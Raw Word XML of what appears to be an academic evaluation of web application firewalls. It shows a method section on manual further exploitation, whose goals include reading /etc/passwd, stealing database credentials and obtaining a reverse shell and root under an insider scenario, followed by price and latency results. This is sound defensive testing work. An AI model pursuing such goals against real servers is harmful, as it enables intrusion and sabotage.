        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00A742AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FB64F" w14:textId="60D0F270" w:rsidR="00133670" w:rsidRDefault="00133670" w:rsidP="00A742AB">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A167C46" wp14:editId="3BAA5F86">
            <wp:extent cx="5731510" cy="267906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79065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF1A8A0" w14:textId="32685C31" w:rsidR="00A742AB" w:rsidRPr="00DE6606" w:rsidRDefault="00A742AB" w:rsidP="00A742AB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc71138538"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Burp Suite broken authentication via dictionary attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="064DF326" w14:textId="7E70E5D6" w:rsidR="00133670" w:rsidRPr="00A8035E" w:rsidRDefault="00D07633" w:rsidP="00D07633">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.5.4 </w:t>
      </w:r>
      <w:r w:rsidR="00A8035E" w:rsidRPr="00A8035E">
        <w:t>Further exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960736A" w14:textId="1CC229A6" w:rsidR="00A8035E" w:rsidRDefault="00A8035E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Once the tests were carried out and the results had been analysed, further exploitations were attempted to see if extended attacks using the payloads would be blocked by the respective WAFs. The reason for this was that WAFs block requests based on rules. Some rules may detect patterns rather than simple keywords</w:t>
      </w:r>
      <w:r w:rsidR="00E0220B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or phrases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC47495" w14:textId="0D7941A4" w:rsidR="00A67DDA" w:rsidRDefault="00A67DDA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To do this well, the exploitations were not done blindly. The objective of the further exploitations would be to gather information from the web servers or gain access to the servers’ resources.</w:t>
      </w:r>
      <w:r w:rsidR="003310C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The process for the further exploitations was manual. There was no intervention from Burp Suite. The only tool used was the browser, Firefox</w:t>
      </w:r>
      <w:r w:rsidR="00850841">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, to access the web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD7DDC2" w14:textId="67772AE5" w:rsidR="00E664BE" w:rsidRDefault="00E664BE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The objectives include gaining information of the server’s OS, open ports, available processes, hostname, internal IP address, database (DB) credentials, gain access to sensitive files such as /etc/passwd, obtaining reverse shell and if possible, ultimately, to gain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF98EF5" w14:textId="25D16C8C" w:rsidR="00EF0F16" w:rsidRPr="00DE6606" w:rsidRDefault="00EF0F16" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For the reverse shell attempt, a scenario was assumed. The scenario would be that a disgruntled employee of the company whom had access to only the fifth server (as described </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">in the network topology subsection), wanted to gain access to the web servers to sabotage the company. </w:t>
      </w:r>
      <w:r w:rsidR="00E5151D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The employee did not have any information nor access to the web servers except for the fact that the web servers hosted vulnerable web applications but had onboarded WAFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0C084" w14:textId="77777777" w:rsidR="00133670" w:rsidRPr="00DE6606" w:rsidRDefault="00133670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD5E534" w14:textId="77777777" w:rsidR="00133670" w:rsidRPr="00DE6606" w:rsidRDefault="00133670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C37C6" w14:textId="4E285F93" w:rsidR="009A3CCD" w:rsidRPr="00DE6606" w:rsidRDefault="00ED4A81" w:rsidP="00ED4A81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc71138498"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="000E2933" w:rsidRPr="00DE6606">
        <w:t>Results</w:t>
      </w:r>
      <w:r w:rsidR="001C6AA5" w:rsidRPr="00DE6606">
        <w:t xml:space="preserve"> &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="64BF3969" w14:textId="3E469A9E" w:rsidR="0021059B" w:rsidRPr="0021059B" w:rsidRDefault="0021059B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we take a look at the results and analyse the results of the tests described in the </w:t>
      </w:r>
      <w:r w:rsidR="005F6978">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E44BE6" w14:textId="0709D8F9" w:rsidR="00A41F3E" w:rsidRPr="00DE6606" w:rsidRDefault="00ED4A81" w:rsidP="00ED4A81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc71138499"/>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A41F3E" w:rsidRPr="00DE6606">
        <w:t>Price</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="4F40756B" w14:textId="2CC41C72" w:rsidR="00A41F3E" w:rsidRPr="00DE6606" w:rsidRDefault="00A41F3E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The plans of each product that was chosen were the lowest cost plans respectively that offered WAF. ModSecurity is free, given that it is open source. Imperva’s lowest plan with WAF </w:t>
      </w:r>
      <w:r w:rsidR="006C0302">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s the Pro plan which starts from $59 per month, while Cloudflare’s </w:t>
      </w:r>
      <w:r w:rsidR="0019681E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Pro plan which costs $20 per month.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E572EB" w14:textId="5B2DB537" w:rsidR="00A41F3E" w:rsidRPr="00DE6606" w:rsidRDefault="00A41F3E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ModSecurity’s rulesets are self-managed, where latest updates </w:t>
      </w:r>
      <w:r w:rsidR="0025589B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> required to be downloaded manually. ModSecurity’s WAF </w:t>
      </w:r>
      <w:r w:rsidR="005356F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> required to be installed on a server. Imperva’s and Cloudflare’s cloud WAFs’ rulesets </w:t>
      </w:r>
      <w:r w:rsidR="004B7142">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> managed by the respective organisations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00FA635C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> not require</w:t>
      </w:r>
      <w:r w:rsidR="00695E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> installation on a server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B769489" w14:textId="5D34190B" w:rsidR="00A41F3E" w:rsidRPr="00DE6606" w:rsidRDefault="00022261" w:rsidP="00022261">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc71138500"/>
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00A41F3E">
        <w:t>Performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="6F2D2CA6" w14:textId="75B7AA4E" w:rsidR="00A41F3E" w:rsidRDefault="00A41F3E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Performance of the WAFs were measured by measuring the latency. The duration (in </w:t>
      </w:r>
      <w:r w:rsidR="009E20DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>milli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>seconds) it took for the web application</w:t>
      </w:r>
      <w:r w:rsidR="0022551E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> index page</w:t>
      </w:r>
      <w:r w:rsidR="00986851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of size 243 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on each server</w:t>
      </w:r>
      <w:r w:rsidR="00241262">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, located </w:t>
      </w:r>
      <w:r w:rsidR="009E20DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00241262">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> United States West, Oregon,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="0022551E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
      <w:r w:rsidR="0022551E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="009E20DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Chrome browser from five countries was observed and recorded</w:t>
      </w:r>
      <w:r w:rsidR="00217AD4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The average duration</w:t>
      </w:r>
      <w:r w:rsidR="00BE1849">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 10 requests</w:t>
      </w:r>
      <w:r w:rsidR="00217AD4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> taken from each country was calculated and presented in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00F46699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3360"/>
        <w:gridCol w:w="1221"/>
        <w:gridCol w:w="1640"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="1339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="1D5B13A1" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51BF401C" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5280" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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10B6629" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="2D3114D1" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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A0CCE12" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684A666C" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>w/o WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09482DEE" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3116BE22" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5088DA72" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
